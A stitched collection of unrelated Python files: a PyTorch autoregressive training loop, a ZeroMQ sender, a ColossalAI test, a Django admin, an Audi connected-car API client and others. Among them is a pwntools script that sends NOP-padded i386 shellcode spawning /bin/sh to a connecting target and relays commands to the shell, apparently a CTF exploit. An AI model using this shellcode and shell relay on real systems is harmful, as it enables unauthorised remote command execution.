early_stopping.counter, early_stopping.patience)
)
##-------------------------------------------------------------.
# The following code can be used to debug training if loss diverge to nan
if dict_training_loss_per_ar_iteration[0].item() > 10000: # TODO: This require CPU-GPU synchronization
ar_training_info_fpath = os.path.join(os.path.dirname(model_fpath), "AR_TrainingInfo.pickle")
with open(ar_training_info_fpath, 'wb') as handle:
pickle.dump(ar_training_info, handle, protocol=pickle.HIGHEST_PROTOCOL)
raise ValueError("The training has diverged. The training info can be recovered using: \n"
"with open({!r}, 'rb') as handle: \n"
" ar_training_info = pickle.load(handle)".format(ar_training_info_fpath))
##-----------------------------------------------------------------.
# TODO: SWAG Description
if swag_training:
if batch_count in collection_indices:
swag_model.collect_model(model)
##-----------------------------------------------------------------.
### Run validation
if validationDataset is not None:
if ar_training_info.iteration_from_last_scoring == scoring_interval:
# Set model layers (i.e. batchnorm) in evaluation mode
model.eval()
# Retrieve batch for validation
validation_batch_dict = next(validationDataLoader_iter)
# Initialize
dict_validation_loss_per_ar_iteration = {}
dict_validation_Y_predicted = {}
#----------------------------------------------------------.
# SWAG: collect, sample and update batch norm statistics
if swag_training:
swag_model.collect_model(model)
with torch.no_grad():
swag_model.sample(0.0)
bn_update_with_loader(swag_model, trainingDataLoader,
ar_iterations = ar_scheduler.current_ar_iterations,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
#----------------------------------------------------------.
# Disable gradient calculations
# - And do not update network weights
with torch.set_grad_enabled(False):
# Autoregressive loop
for ar_iteration in range(ar_scheduler.current_ar_iterations+1):
# Retrieve X and Y for current AR iteration
torch_X, torch_Y = ar_batch_fun(ar_iteration = ar_iteration,
batch_dict = validation_batch_dict,
dict_Y_predicted = dict_validation_Y_predicted,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
##------------------------------------------------.
# Forward pass and store output for stacking into next AR iterations
dict_validation_Y_predicted[ar_iteration] = swag_model(torch_X) if swag_training else model(torch_X)
##------------------------------------------------.
# Compute loss for current forecast iteration
# - The criterion expects [data_points, nodes, features]
Y_pred, Y_obs = reshape_tensors_4_loss(Y_pred = dict_validation_Y_predicted[ar_iteration],
Y_obs = torch_Y,
dim_info_dynamic = dim_info_dynamic)
dict_validation_loss_per_ar_iteration[ar_iteration] = criterion(Y_obs, Y_pred)
##------------------------------------------------.
# Remove unnecessary stored Y predictions
remove_unused_Y(ar_iteration = ar_iteration,
dict_Y_predicted = dict_validation_Y_predicted,
dict_Y_to_remove = validation_batch_dict['dict_Y_to_remove'])
del Y_pred, Y_obs, torch_X, torch_Y
if ar_iteration == ar_scheduler.current_ar_iterations:
del dict_validation_Y_predicted
##--------------------------------------------------------.
### Compute total (AR weighted) loss
for i, (ar_iteration, loss) in enumerate(dict_validation_loss_per_ar_iteration.items()):
if i == 0:
validation_total_loss = ar_scheduler.ar_weights[ar_iteration] * loss
else:
validation_total_loss += ar_scheduler.ar_weights[ar_iteration] * loss
##--------------------------------------------------------.
### Update validation info # TODO: This require CPU-GPU synchronization
ar_training_info.update_validation_stats(total_loss = validation_total_loss,
dict_loss_per_ar_iteration = dict_validation_loss_per_ar_iteration)
##--------------------------------------------------------.
### Reset model to training mode
model.train()
##--------------------------------------------------------.
### Print scoring
t_f_scoring = round(time.time() - t_i_scoring)
print("Epoch: {} | Batch: {}/{} | AR: {} | Loss: {} | "
"ES: {}/{} | Elapsed time: {}s".format(epoch, batch_count, num_batches,
ar_iteration,
round(dict_validation_loss_per_ar_iteration[ar_iteration].item(),5), # TODO: This require CPU-GPU synchronization
early_stopping.counter, early_stopping.patience,
t_f_scoring)
)
t_i_scoring = time.time()
##---------------------------------------------------------.
# The following code can be used to debug training if loss diverge to nan
if dict_validation_loss_per_ar_iteration[0].item() > 10000: # TODO: This require CPU-GPU synchronization
ar_training_info_fpath = os.path.join(os.path.dirname(model_fpath), "AR_TrainingInfo.pickle")
with open(ar_training_info_fpath, 'wb') as handle:
pickle.dump(ar_training_info, handle, protocol=pickle.HIGHEST_PROTOCOL)
raise ValueError("The training has diverged. The training info can be recovered using: \n"
"with open({!r}, 'rb') as handle: \n"
" ar_training_info = pickle.load(handle)".format(ar_training_info_fpath))
##--------------------------------------------------------.
##----------------------------------------------------------------.
# - Update learning rate
if lr_scheduler is not None:
lr_scheduler.step()
##----------------------------------------------------------------.
# - Update the AR weights
ar_scheduler.step()
##----------------------------------------------------------------.
# - Evaluate stopping metrics and update AR scheduler if the loss has plateau
if ar_training_info.iteration_from_last_scoring == scoring_interval:
# Reset counter for scoring
ar_training_info.reset_counter()
##-------------------------------------------------------------.
# If the model has not improved (based on early stopping settings)
# - If current_ar_iterations < ar_iterations --> Update AR scheduler
# - If current_ar_iterations = ar_iterations --> Stop training
if early_stopping is not None and early_stopping(ar_training_info):
# - If current_ar_iterations < ar_iterations --> Update AR scheduler
if ar_scheduler.current_ar_iterations < ar_iterations:
##----------------------------------------------------.
# Update the AR scheduler
ar_scheduler.update()
# Reset iteration counter from last AR weight update
ar_training_info.reset_iteration_from_last_ar_update()
# Reset early stopping
early_stopping.reset()
# Print info
current_ar_training_info = "(epoch: {}, iteration: {}, total_iteration: {})".format(ar_training_info.epoch,
ar_training_info.epoch_iteration,
ar_training_info.iteration)
print("")
print("========================================================================================")
print("- Updating training to {} AR iterations {}.".format(ar_scheduler.current_ar_iterations, current_ar_training_info))
##----------------------------------------------------.
# Update Datasets (to prefetch the correct amount of data)
# - Training
del trainingDataLoader, trainingDataLoader_iter # to avoid deadlocks
trainingDataset.update_ar_iterations(ar_scheduler.current_ar_iterations)
# - Validation
if validationDataset is not None:
del validationDataLoader, validationDataLoader_iter # to avoid deadlocks
validationDataset.update_ar_iterations(ar_scheduler.current_ar_iterations)
##----------------------------------------------------.
## Time execution
# - Time AR training
print("")
print("- Timing AR training with {} AR iterations:".format(trainingDataset.ar_iterations))
training_num_workers = tune_num_workers(dataset = trainingDataset,
model = model,
optimizer = optimizer,
criterion = criterion,
num_workers_list = num_workers_list,
ar_scheduler = ar_scheduler,
ar_training_strategy = ar_training_strategy,
# DataLoader options
batch_size = training_batch_size,
shuffle = shuffle,
shuffle_seed = shuffle_seed, # This cause training on same batch n_repetitions times
prefetch_in_gpu = prefetch_in_gpu,
prefetch_factor = prefetch_factor,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
# Timing options
training_mode = True,
n_repetitions = 5,
verbose = True)
print('--> Selecting num_workers={} for TrainingDataLoader.'.format(training_num_workers))
# - Time AR validation
if validationDataset is not None:
print("")
print("- Timing AR validation with {} AR iterations:".format(validationDataset.ar_iterations))
validation_num_workers = tune_num_workers(dataset = validationDataset,
model = model,
optimizer = optimizer,
criterion = criterion,
num_workers_list = num_workers_list,
ar_scheduler = ar_scheduler,
ar_training_strategy = ar_training_strategy,
# DataLoader options
batch_size = validation_batch_size,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
prefetch_in_gpu = prefetch_in_gpu,
prefetch_factor = prefetch_factor,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
# Timing options
training_mode = False,
n_repetitions = 5,
verbose = True)
print('--> Selecting num_workers={} for ValidationDataLoader.'.format(validation_num_workers))
##----------------------------------------------------------------.
# Update DataLoaders (to prefetch the correct amount of data)
shuffle_seed += 1
trainingDataLoader = AutoregressiveDataLoader(dataset = trainingDataset,
batch_size = training_batch_size,
drop_last_batch = drop_last_batch,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
num_workers = training_num_workers,
prefetch_factor = prefetch_factor,
prefetch_in_gpu = prefetch_in_gpu,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
trainingDataLoader_iter = cylic_iterator(trainingDataLoader)
if validationDataset is not None:
validationDataset.update_ar_iterations(ar_scheduler.current_ar_iterations)
validationDataLoader = AutoregressiveDataLoader(dataset = validationDataset,
batch_size = validation_batch_size,
drop_last_batch = drop_last_batch,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
num_workers = validation_num_workers,
prefetch_in_gpu = prefetch_in_gpu,
prefetch_factor = prefetch_factor,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
validationDataLoader_iter = cylic_iterator(validationDataLoader)
##--------------------------------------------------------.
# - If current_ar_iterations = ar_iterations --> Stop training
else:
# Stop training
flag_stop_training = True
break
##----------------------------------------------------------------.
# - Update iteration count
ar_training_info.step()
##--------------------------------------------------------------------.
### Print epoch training statistics
ar_training_info.print_epoch_info()
if flag_stop_training:
break
##--------------------------------------------------------------------.
# Option to save the model each epoch
if save_model_each_epoch:
model_weights = swag_model.state_dict() if swag_training else model.state_dict()
torch.save(model_weights, model_fpath[:-3] + '_epoch_{}'.format(epoch) + '.h5')
##-------------------------------------------------------------------------.
### Save final model
print(" ")
print("========================================================================================")
print("- Training ended !")
print("- Total elapsed time: {:.2f} hours.".format((time.time()-time_start_training)/60/60))
print("- Saving model to {}".format(model_fpath))
model_weights = swag_model.state_dict() if (swag and swag_model) else model.state_dict()
torch.save(model_weights, f=model_fpath)
##-------------------------------------------------------------------------.
### Save AR TrainingInfo
print("========================================================================================")
print("- Saving training information")
with open(os.path.join(os.path.dirname(model_fpath), "AR_TrainingInfo.pickle"), 'wb') as handle:
pickle.dump(ar_training_info, handle, protocol=pickle.HIGHEST_PROTOCOL)
##-------------------------------------------------------------------------.
## Remove Dataset and DataLoaders to avoid deadlocks
del validationDataset
del validationDataLoader
del validationDataLoader_iter
del trainingDataset
del trainingDataLoader
del trainingDataLoader_iter
##------------------------------------------------------------------------.
# Return training info object
return ar_training_info
#-----------------------------------------------------------------------------.
|
import zmq
class Sender(object):
port = "5556"
context = zmq.Context()
socket = context.socket(zmq.PUB)
def __init__(self):
self.socket.bind("tcp://*:%s" % self.port)
def send(self,message):
self.socket.send_string(message)
print('sender message - %s' % message) # For debug uses
|
print ('='*40, '\nESCREVA UM NÚMERO DE 4 DIGITOS')
print ('=' *40)
num = int ( input ('Número ? ' ))
dez1 = (num // 100) #variaveis
dez2 = (num % 100) #variaveis
raiz = num **(1/2) #variaveis
if ( raiz == dez1 + dez2 ):
print ('-' *40)
print ('ESSE NÚMERO É UM QUADRADO PERFEITO! :) ')
else :
print ('-' *40)
print ('ESSE NÚMERO NÃO É UM QUADRADO PERFEITO! :( ' )
|
from functools import partial
import colossalai
import pytest
import torch
import torch.multiprocessing as mp
from colossalai.amp.amp_type import AMP_TYPE
from colossalai.logging import get_dist_logger
from colossalai.trainer import Trainer
from colossalai.utils import MultiTimer, free_port
from tests.components_to_test.registry import non_distributed_component_funcs
from colossalai.testing import parameterize
BATCH_SIZE = 4
IMG_SIZE = 32
NUM_EPOCHS = 200
CONFIG = dict(fp16=dict(mode=AMP_TYPE.TORCH))
@parameterize('model_name', ['repeated_computed_layers', 'resnet18', 'nested_model'])
def run_trainer(model_name):
get_components_func = non_distributed_component_funcs.get_callable(model_name)
model_builder, train_dataloader, test_dataloader, optimizer_class, criterion = get_components_func()
model = model_builder()
optimizer = optimizer_class(model.parameters(), lr=1e-3)
engine, train_dataloader, *_ = colossalai.initialize(model=model,
optimizer=optimizer,
criterion=criterion,
train_dataloader=train_dataloader)
logger = get_dist_logger()
logger.info("engine is built", ranks=[0])
timer = MultiTimer()
trainer = Trainer(engine=engine, logger=logger, timer=timer)
logger.info("trainer is built", ranks=[0])
logger.info("start training", ranks=[0])
trainer.fit(train_dataloader=train_dataloader,
test_dataloader=test_dataloader,
epochs=NUM_EPOCHS,
max_steps=3,
display_progress=True,
test_interval=5)
torch.cuda.empty_cache()
def run_dist(rank, world_size, port):
colossalai.launch(config=CONFIG, rank=rank, world_size=world_size, host='localhost', port=port, backend='nccl')
@pytest.mark.dist
def test_trainer_no_pipeline():
world_size = 4
run_func = partial(run_dist, world_size=world_size, port=free_port())
mp.spawn(run_func, nprocs=world_size)
if __name__ == '__main__':
test_trainer_no_pipeline()
|
"""
PKI module
"""
__all__ = ['pki_methods', 'pki_methods_spec', 'executables_path', 'config_methods', 'init_pki']
|
from __future__ import absolute_import
from django.contrib import admin
from .models import Question, Topic
class TopicAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug':('name',)}
class QuestionAdmin(admin.ModelAdmin):
list_display = ['text', 'sort_order', 'created_by', 'created_on',
'updated_by', 'updated_on', 'status']
list_editable = ['sort_order', 'status']
def save_model(self, request, obj, form, change):
'''
Update created-by / modified-by fields.
The date fields are upadated at the model layer, but that's not got
access to the user.
'''
# If the object's new update the created_by field.
if not change:
obj.created_by = request.user
# Either way update the updated_by field.
obj.updated_by = request.user
# Let the superclass do the final saving.
return super(QuestionAdmin, self).save_model(request, obj, form, change)
admin.site.register(Question, QuestionAdmin)
admin.site.register(Topic, TopicAdmin)
|
from pwn import *
import socket
import select
import sys
context.arch = 'i386'
reverse_shellcode = asm('''
push 0x3f
pop eax
xor ebx, ebx
push 0x1
pop ecx
int 0x80
push 0xb
pop eax
push 0x0068732f
push 0x6e69622f
mov ebx, esp
xor ecx, ecx
xor edx, edx
int 0x80
''')
HOST = '0.0.0.0'
PORT = 4444
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((HOST, PORT))
sock.listen(1)
conn, addr = sock.accept()
conn.sendall(b'\x90' * 0x3c + reverse_shellcode)
while True:
reading, writing, exception = select.select([conn, sys.stdin], [], [])
for s in reading:
if s is sys.stdin:
command = input().encode()
conn.sendall(command)
elif s is conn:
conn.setblocking(0)
data = conn.recv(4096).decode()
print(data, end = '')
|
from abc import abstractmethod, ABCMeta
import json
import uuid
import base64
import os
import math
import re
import logging
from time import strftime, gmtime
from datetime import timedelta, datetime
from .audi_models import (
TripDataResponse,
CurrentVehicleDataResponse,
VehicleDataResponse,
VehiclesResponse,
Vehicle,
)
from .audi_api import AudiAPI
from .util import to_byte_array, get_attr
from hashlib import sha256, sha512
import hmac
import asyncio
from urllib.parse import urlparse, parse_qs, urlencode
import requests
from bs4 import BeautifulSoup
from requests import RequestException
from typing import Dict
MAX_RESPONSE_ATTEMPTS = 10
REQUEST_STATUS_SLEEP = 10
SUCCEEDED = "succeeded"
FAILED = "failed"
REQUEST_SUCCESSFUL = "request_successful"
REQUEST_FAILED = "request_failed"
XCLIENT_ID = "77869e21-e30a-4a92-b016-48ab7d3db1d8"
_LOGGER = logging.getLogger(__name__)
class BrowserLoginResponse:
def __init__(self, response: requests.Response, url: str):
self.response = response # type: requests.Response
self.url = url # type : str
def get_location(self) -> str:
"""
Returns the location the previous request redirected to
"""
location = self.response.headers["Location"]
if location.startswith("/"):
# Relative URL
return BrowserLoginResponse.to_absolute(self.url, location)
return location
@classmethod
def to_absolute(cls, absolute_url, relative_url) -> str:
"""
Converts a relative url to an absolute url
:param absolute_url: Absolute url used as baseline
:param relative_url: Relative url (must start with /)
:return: New absolute url
"""
url_parts = urlparse(absolute_url)
return url_parts.scheme + "://" + url_parts.netloc + relative_url
class AudiService:
def __init__(self, api: AudiAPI, country: str, spin: str):
self._api = api
self._country = country
self._language = None
self._type = "Audi"
self._spin = spin
self._homeRegion = {}
self._homeRegionSetter = {}
self.mbbOAuthBaseURL = None
self.mbboauthToken = None
self.xclientId = None
self._tokenEndpoint = ""
self._bearer_token_json = None
self._client_id = ""
self._authorizationServerBaseURLLive = ""
if self._country is None:
self._country = "DE"
def get_hidden_html_input_form_data(self, response, form_data: Dict[str, str]):
# Now parse the html body and extract the target url, csrf token and other required parameters
html = BeautifulSoup(response, "html.parser")
form_tag = html.find("form")
form_inputs = html.find_all("input", attrs={"type": "hidden"})
for form_input in form_inputs:
name = form_input.get("name")
form_data[name] = form_input.get("value")
return form_data
def get_post_url(self, response, url):
# Now parse the html body and extract the target url, csrf token and other required parameters
html = BeautifulSoup(response, "html.parser")
form_tag = html.find("form")
# Extract the target url
action = form_tag.get("action")
if action.startswith("http"):
# Absolute url
username_post_url = action
elif action.startswith("/"):
# Relative to domain
username_post_url = BrowserLoginResponse.to_absolute(url, action)
else:
raise RequestException("Unknown form action: " + action)
return username_post_url
async def login(self, user: str, password: str, persist_token: bool = True):
await self.login_request(user, password)
async def refresh_vehicle_data(self, vin: str):
res = await self.request_current_vehicle_data(vin.upper())
request_id = res.request_id
checkUrl = "{homeRegion}/fs-car/bs/vsr/v1/{type}/{country}/vehicles/{vin}/requests/{requestId}/jobstatus".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type,
country=self._country,
vin=vin.upper(),
requestId=request_id,
)
await self.check_request_succeeded(
checkUrl,
"refresh vehicle data",
REQUEST_SUCCESSFUL,
REQUEST_FAILED,
"requestStatusResponse.status",
)
async def request_current_vehicle_data(self, vin: str):
self._api.use_token(self.vwToken)
data = await self._api.post(
"{homeRegion}/fs-car/bs/vsr/v1/{type}/{country}/vehicles/{vin}/requests".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
)
)
return CurrentVehicleDataResponse(data)
async def get_preheater(self, vin: str):
self._api.use_token(self.vwToken)
return await self._api.get(
"{homeRegion}/fs-car/bs/rs/v1/{type}/{country}/vehicles/{vin}/status".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
)
)
async def get_stored_vehicle_data(self, vin: str):
self._api.use_token(self.vwToken)
data = await self._api.get(
"{homeRegion}/fs-car/bs/vsr/v1/{type}/{country}/vehicles/{vin}/status".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
)
)
return VehicleDataResponse(data)
async def get_charger(self, vin: str):
self._api.use_token(self.vwToken)
return await self._api.get(
"{homeRegion}/fs-car/bs/batterycharge/v1/{type}/{country}/vehicles/{vin}/charger".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
)
)
async def get_climater(self, vin: str):
self._api.use_token(self.vwToken)
return await self._api.get(
"{homeRegion}/fs-car/bs/climatisation/v1/{type}/{country}/vehicles/{vin}/climater".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
)
)
async def get_stored_position(self, vin: str):
self._api.use_token(self.vwToken)
return await self._api.get(
"{homeRegion}/fs-car/bs/cf/v1/{type}/{country}/vehicles/{vin}/position".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
)
)
async def get_operations_list(self, vin: str):
self._api.use_token(self.vwToken)
return await self._api.get(
"https://mal-1a.prd.ece.vwg-connect.com/api/rolesrights/operationlist/v3/vehicles/"
+ vin.upper()
)
async def get_timer(self, vin: str):
self._api.use_token(self.vwToken)
return await self._api.get(
"{homeRegion}/fs-car/bs/departuretimer/v1/{type}/{country}/vehicles/{vin}/timer".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
)
)
async def get_vehicles(self):
self._api.use_token(self.vwToken)
return await self._api.get(
"https://msg.volkswagen.de/fs-car/usermanagement/users/v1/{type}/{country}/vehicles".format(
type=self._type, country=self._country
)
)
async def get_vehicle_information(self):
headers = {
"Accept": "application/json",
"Accept-Charset": "utf-8",
"X-App-Name": "myAudi",
"X-App-Version": AudiAPI.HDR_XAPP_VERSION,
"Accept-Language": "{l}-{c}".format(
l=self._language, c=self._country.upper()
),
"X-User-Country": self._country.upper(),
"User-Agent": AudiAPI.HDR_USER_AGENT,
"Authorization": "Bearer " + self.audiToken["access_token"],
"Content-Type": "application/json; charset=utf-8",
}
req_data = {
"query": "query vehicleList {\n userVehicles {\n vin\n mappingVin\n vehicle { core { modelYear\n }\n media { shortName\n longName }\n }\n csid\n commissionNumber\n type\n devicePlatform\n mbbConnect\n userRole {\n role\n }\n vehicle {\n classification {\n driveTrain\n }\n }\n nickname\n }\n}"
}
req_rsp, rep_rsptxt = await self._api.request(
"POST",
"https://app-api.live-my.audi.com/vgql/v1/graphql",
json.dumps(req_data),
headers=headers,
allow_redirects=False,
rsp_wtxt=True,
)
vins = json.loads(rep_rsptxt)
if "data" not in vins:
raise Exception("Invalid json in get_vehicle_information")
response = VehiclesResponse()
response.parse(vins["data"])
return response
async def get_vehicle_data(self, vin: str):
self._api.use_token(self.vwToken)
data = await self._api.get(
"{homeRegion}/fs-car/vehicleMgmt/vehicledata/v2/{type}/{country}/vehicles/{vin}/".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
)
)
async def get_tripdata(self, vin: str, kind: str):
self._api.use_token(self.vwToken)
# read tripdata
headers = {
"Accept": "application/json",
"Accept-Charset": "utf-8",
"X-App-Name": "myAudi",
"X-App-Version": AudiAPI.HDR_XAPP_VERSION,
"X-Client-ID": self.xclientId,
"User-Agent": AudiAPI.HDR_USER_AGENT,
"Authorization": "Bearer " + self.vwToken["access_token"],
}
td_reqdata = {
"type": "list",
"from": "1970-01-01T00:00:00Z",
# "from":(datetime.utcnow() - timedelta(days=365)).strftime("%Y-%m-%dT%H:%M:%SZ"),
"to": (datetime.utcnow() + timedelta(minutes=90)).strftime("%Y-%m-%dT%H:%M:%SZ"),
}
data = await self._api.request(
"GET",
"{homeRegion}/api/bs/tripstatistics/v1/vehicles/{vin}/tripdata/{kind}".format(
homeRegion=await self._get_home_region_setter(vin.upper()),
vin=vin.upper(),
kind=kind,
),
None,
params=td_reqdata,
headers=headers,
)
td_sorted = sorted(
data["tripDataList"]["tripData"],
key=lambda k: k["overallMileage"],
reverse=True,
)
td_current = td_sorted[0]
td_reset_trip = None
for trip in td_sorted:
if (td_current["startMileage"] - trip["startMileage"]) > 2:
td_reset_trip = trip
break
else:
td_current["tripID"] = trip["tripID"]
td_current["startMileage"] = trip["startMileage"]
return TripDataResponse(td_current), TripDataResponse(td_reset_trip)
async def _fill_home_region(self, vin: str):
self._homeRegion[vin] = "https://msg.volkswagen.de"
self._homeRegionSetter[vin] = "https://mal-1a.prd.ece.vwg-connect.com"
try:
self._api.use_token(self.vwToken)
res = await self._api.get("https://mal-1a.prd.ece.vwg-connect.com/api/cs/vds/v1/vehicles/{vin}/homeRegion".format(vin=vin))
if res != None and res.get("homeRegion") != None and res["homeRegion"].get("baseUri") != None and res["homeRegion"]["baseUri"].get("content") != None:
uri = res["homeRegion"]["baseUri"]["content"]
if uri != "https://mal-1a.prd.ece.vwg-connect.com/api":
self._homeRegionSetter[vin] = uri.split("/api")[0]
self._homeRegion[vin] = self._homeRegionSetter[vin].replace("mal-", "fal-")
except Exception:
pass
async def _get_home_region(self, vin: str):
if self._homeRegion.get(vin) != None:
return self._homeRegion[vin]
await self._fill_home_region(vin)
return self._homeRegion[vin]
async def _get_home_region_setter(self, vin: str):
if self._homeRegionSetter.get(vin) != None:
return self._homeRegionSetter[vin]
await self._fill_home_region(vin)
return self._homeRegionSetter[vin]
async def _get_security_token(self, vin: str, action: str):
# Challenge
headers = {
"User-Agent": "okhttp/3.7.0",
"X-App-Version": "3.14.0",
"X-App-Name": "myAudi",
"Accept": "application/json",
"Authorization": "Bearer " + self.vwToken.get("access_token"),
}
body = await self._api.request(
"GET",
"{homeRegionSetter}/api/rolesrights/authorization/v2/vehicles/".format(homeRegionSetter=await self._get_home_region_setter(vin.upper()))
+ vin.upper()
+ "/services/"
+ action
+ "/security-pin-auth-requested",
headers=headers,
data=None,
)
secToken = body["securityPinAuthInfo"]["securityToken"]
challenge = body["securityPinAuthInfo"]["securityPinTransmission"]["challenge"]
# Response
securityPinHash = self._generate_security_pin_hash(challenge)
data = {
"securityPinAuthentication": {
"securityPin": {
"challenge": challenge,
"securityPinHash": securityPinHash,
},
"securityToken": secToken,
}
}
headers = {
"User-Agent": "okhttp/3.7.0",
"Content-Type": "application/json",
"X-App-Version": "3.14.0",
"X-App-Name": "myAudi",
"Accept": "application/json",
"Authorization": "Bearer " + self.vwToken.get("access_token"),
}
body = await self._api.request(
"POST",
"{homeRegionSetter}/api/rolesrights/authorization/v2/security-pin-auth-completed".format(homeRegionSetter=await self._get_home_region_setter(vin.upper())),
headers=headers,
data=json.dumps(data),
)
return body["securityToken"]
def _get_vehicle_action_header(self, content_type: str, security_token: str):
headers = {
"User-Agent": "okhttp/3.7.0",
"Host": "msg.volkswagen.de",
"X-App-Version": "3.14.0",
"X-App-Name": "myAudi",
"Authorization": "Bearer " + self.vwToken.get("access_token"),
"Accept-charset": "UTF-8",
"Content-Type": content_type,
"Accept": "application/json, application/vnd.vwg.mbb.ChargerAction_v1_0_0+xml,application/vnd.volkswagenag.com-error-v1+xml,application/vnd.vwg.mbb.genericError_v1_0_2+xml, application/vnd.vwg.mbb.RemoteStandheizung_v2_0_0+xml, application/vnd.vwg.mbb.genericError_v1_0_2+xml,application/vnd.vwg.mbb.RemoteLockUnlock_v1_0_0+xml,*/*",
}
if security_token != None:
headers["x-mbbSecToken"] = security_token
return headers
async def set_vehicle_lock(self, vin: str, lock: bool):
security_token = await self._get_security_token(
vin, "rlu_v1/operations/" + ("LOCK" if lock else "UNLOCK")
)
data = '<?xml version="1.0" encoding= "UTF-8" ?><rluAction xmlns="http://audi.de/connect/rlu"><action>{action}</action></rluAction>'.format(
action="lock" if lock else "unlock"
)
headers = self._get_vehicle_action_header(
"application/vnd.vwg.mbb.RemoteLockUnlock_v1_0_0+xml", security_token
)
res = await self._api.request(
"POST",
"{homeRegion}/fs-car/bs/rlu/v1/{type}/{country}/vehicles/{vin}/actions".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
),
headers=headers,
data=data,
)
checkUrl = "{homeRegion}/fs-car/bs/rlu/v1/{type}/{country}/vehicles/{vin}/requests/{requestId}/status".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type,
country=self._country,
vin=vin.upper(),
requestId=res["rluActionResponse"]["requestId"],
)
await self.check_request_succeeded(
checkUrl,
"lock vehicle" if lock else "unlock vehicle",
REQUEST_SUCCESSFUL,
REQUEST_FAILED,
"requestStatusResponse.status",
)
async def set_battery_charger(self, vin: str, start: bool, timer: bool):
if start and timer:
data = '{ "action": { "type": "selectChargingMode", "settings": { "chargeModeSelection": { "value": "timerBasedCharging" } } }}'
elif start:
data = '{ "action": { "type": "selectChargingMode", "settings": { "chargeModeSelection": { "value": "immediateCharging" } } }}'
else:
data = '{ "action": { "type": "stop" }}'
headers = self._get_vehicle_action_header(
"application/json", None
)
res = await self._api.request(
"POST",
"{homeRegion}/fs-car/bs/batterycharge/v1/{type}/{country}/vehicles/{vin}/charger/actions".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
),
headers=headers,
data=data,
)
checkUrl = "{homeRegion}/fs-car/bs/batterycharge/v1/{type}/{country}/vehicles/{vin}/charger/actions/{actionid}".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type,
country=self._country,
vin=vin.upper(),
actionid=res["action"]["actionId"],
)
await self.check_request_succeeded(
checkUrl,
"start charger" if start else "stop charger",
SUCCEEDED,
FAILED,
"action.actionState",
)
async def set_climatisation(self, vin: str, start: bool):
if start:
data = '{"action":{"type": "startClimatisation","settings": {"targetTemperature": 2940,"climatisationWithoutHVpower": true,"heaterSource": "electric","climaterElementSettings": {"isClimatisationAtUnlock": false, "isMirrorHeatingEnabled": true,}}}}'
else:
data = '{"action":{"type": "stopClimatisation"}}'
headers = self._get_vehicle_action_header(
'application/json', None
)
res = await self._api.request(
"POST",
"{homeRegion}/fs-car/bs/climatisation/v1/{type}/{country}/vehicles/{vin}/climater/actions".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
),
headers=headers,
data=data,
)
checkUrl = "{homeRegion}/fs-car/bs/climatisation/v1/{type}/{country}/vehicles/{vin}/climater/actions/{actionid}".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type,
country=self._country,
vin=vin.upper(),
actionid=res["action"]["actionId"],
)
await self.check_request_succeeded(
checkUrl,
"start climatisation" if start else "stop climatisation",
SUCCEEDED,
FAILED,
"action.actionState",
)
async def set_window_heating(self, vin: str, start: bool):
data = '<?xml version="1.0" encoding= "UTF-8" ?><action><type>{action}</type></action>'.format(
action="startWindowHeating" if start else "stopWindowHeating"
)
headers = self._get_vehicle_action_header(
"application/vnd.vwg.mbb.ClimaterAction_v1_0_0+xml", None
)
res = await self._api.request(
"POST",
"{homeRegion}/fs-car/bs/climatisation/v1/{type}/{country}/vehicles/{vin}/climater/actions".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
),
headers=headers,
data=data,
)
checkUrl = "{homeRegion}/fs-car/bs/climatisation/v1/{type}/{country}/vehicles/{vin}/climater/actions/{actionid}".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type,
country=self._country,
vin=vin.upper(),
actionid=res["action"]["actionId"],
)
await self.check_request_succeeded(
checkUrl,
"start window heating" if start else "stop window heating",
SUCCEEDED,
FAILED,
"action.actionState",
)
async def set_pre_heater(self, vin: str, activate: bool):
security_token = await self._get_security_token(
vin, "rheating_v1/operations/P_QSACT"
)
data = '<?xml version="1.0" encoding= "UTF-8" ?>{input}'.format(
input='<performAction xmlns="http://audi.de/connect/rs"><quickstart><active>true</active></quickstart></performAction>'
if activate
else '<performAction xmlns="http://audi.de/connect/rs"><quickstop><active>false</active></quickstop></performAction>'
)
headers = self._get_vehicle_action_header(
"application/vnd.vwg.mbb.RemoteStandheizung_v2_0_0+xml", security_token
)
await self._api.request(
"POST",
"{homeRegion}/fs-car/bs/rs/v1/{type}/{country}/vehicles/{vin}/action".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
),
headers=headers,
data=data,
)
async def check_request_succeeded(
